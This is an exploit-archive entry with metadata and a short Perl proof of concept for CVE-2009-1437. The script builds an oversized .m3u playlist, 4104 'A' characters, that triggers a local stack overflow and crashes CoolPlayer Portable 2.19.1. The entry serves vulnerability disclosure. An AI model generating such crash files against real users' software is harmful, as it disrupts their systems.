CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)

Author: GoLd_M
type: dos
platform: windows
port: 
date_added: 2009-04-19  
date_updated: 2011-01-09  
verified: 1  
codes: OSVDB-53885;CVE-2009-1437  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comCoolPlayer219_Bin.zip  

raw file: 8489.pl  
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ##  ##
# #  CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

# milw0rm.com [2009-04-20]